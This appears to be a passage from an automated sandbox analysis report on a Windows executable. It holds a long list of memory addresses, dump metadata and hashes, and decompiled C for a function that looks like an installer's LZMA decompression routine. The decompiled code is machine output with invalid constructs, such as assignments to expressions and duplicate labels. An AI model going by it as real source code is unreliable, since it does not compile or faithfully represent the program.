                                                                0x004065ac
                                                                0x00000000
                                                                0x00406597
                                                                0x00406597
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x004065db
                                                                0x004065db
                                                                0x004065de
                                                                0x004065e5
                                                                0x004065ea
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00406843
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00406a5a
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00406a6b
                                                                0x00406a72
                                                                0x00406a76
                                                                0x00406a76
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b3
                                                                0x004068b6
                                                                0x004068b6
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00406058
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00000000
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406166
                                                                0x00406169
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x00406193
                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406226
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x0040623d
                                                                0x00000000
                                                                0x00406473
                                                                0x00406477
                                                                0x00406495
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a2
                                                                0x004064a5
                                                                0x004064a8
                                                                0x004064ab
                                                                0x004064ae
                                                                0x004064b0
                                                                0x004064b7
                                                                0x004064b8
                                                                0x004064ba
                                                                0x004064bd
                                                                0x004064c0
                                                                0x004064c3
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x004064c8
                                                                0x00406479
                                                                0x0040647c
                                                                0x0040647f
                                                                0x00406489
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00000000
                                                                0x004064dd
                                                                0x004064e1
                                                                0x00406504
                                                                0x00406507
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064e3
                                                                0x004064e6
                                                                0x004064e9
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x004064fc
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00000000
                                                                0x00406520
                                                                0x00406524
                                                                0x00000000
                                                                0x00000000
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00000000
                                                                0x00000000
                                                                0x00406534
                                                                0x00406536
                                                                0x0040653a
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406830
                                                                0x00406833
                                                                0x0040683d
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00000000
                                                                0x004068fe
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069bb
                                                                0x004068bc
                                                                0x00000000
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00406609
                                                                0x0040660c
                                                                0x0040660f
                                                                0x00406611
                                                                0x00406613
                                                                0x00406613
                                                                0x00406614
                                                                0x00406617
                                                                0x0040661e
                                                                0x00406621
                                                                0x0040662f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406914
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00000000
                                                                0x00406a50
                                                                0x0040691e
                                                                0x00406921
                                                                0x00406924
                                                                0x00406928
                                                                0x0040692b
                                                                0x00406931
                                                                0x00406933
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x0040693c
                                                                0x0040693c
                                                                0x00406940
                                                                0x004069a0
                                                                0x004069a3
                                                                0x004069a8
                                                                0x004069a9
                                                                0x004069ab
                                                                0x004069ad
                                                                0x004069b0
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x004068c2
                                                                0x004068bc
                                                                0x00406942
                                                                0x00406948
                                                                0x0040694b
                                                                0x0040694e
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406960
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x00406982
                                                                0x00406985
                                                                0x00406989
                                                                0x0040698b
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x0040696d
                                                                0x00406972
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406992
                                                                0x00406999
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00406582
                                                                0x00406582
                                                                0x00000000
                                                                0x00406582
                                                                0x00406803
                                                                0x00406a38
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00000000
                                                                0x00406a6f
                                                                0x004068bc
                                                                0x00406843
                                                                0x00406840
                                                                0x00000000
                                                                0x00406595

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                                • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
